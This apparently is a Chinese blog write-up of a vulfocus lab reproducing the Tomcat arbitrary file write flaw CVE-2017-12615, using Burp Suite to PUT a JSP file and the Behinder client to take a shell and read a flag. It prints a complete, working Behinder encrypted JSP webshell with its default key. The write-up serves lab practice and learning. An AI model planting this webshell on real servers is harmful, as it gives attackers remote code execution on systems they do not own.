使用vulfocus靶场复现Tomcat 任意写入文件漏洞(CVE-2017-12615)

Tomcat 任意写入文件漏洞(CVE-2017-12615)

搜索CVE-2017-12615

下载完成后可再首页启动环境

访问192.168.229.130:50997即可打开tomcat 文件上传 (CVE-2017-12615)漏洞环境

确定环境没有问题

打开burpsuite 进行任意文件上传

配置burpsuite 代理

复制about:preferences到火狐浏览器中打开,配置代理

再次刷新浏览器可以看到数据已经经过burpsuite代理了

点击send Repeater

修改GET类型为PUT,之后再 最下面插入冰蝎一句话木马,点击send返回201说明成功了

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(Base64.getDecoder().decode(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

打开冰蝎子进行连接

https://github.com/rebeyond/Behinder/releases/download/Behinder_v4.0.5/behinder_v4.0.5.zip

unzip behinder_v4.0.5.zip

java -jar Behinder.jar

运行后可以看到报错了,JDK版本为11.0,冰蝎需要在Java1.8.0下运行

下载jdk1.8.0,进行安装

jdk1.8.0-331.tar.gz安装包-Java文档类资源-CSDN下载

tar zxvf  jdk1.8.0_331.tar.gz
mv jdk1.8.0_331 /opt
update-alternatives --install /usr/bin/java java /opt/jdk1.8.0_331/bin/java 1
update-alternatives --install /usr/bin/javac javac /opt/jdk1.8.0_331/bin/javac 1
update-alternatives --set java /opt/jdk1.8.0_331/bin/java
update-alternatives --set javac /opt/jdk1.8.0_331/bin/javac
java -version

可以看到版本已经为1.8.0了,我们再次运行冰蝎子

java -jar Behinder.jar

新增一个shell链接

http://192.168.229.130:50997/test.jsp

点击保存后双击链接即可打开shell

打开文件管理 /tmp下就可以看到flag

复制flag 进行提交

通过

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

R0ot

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值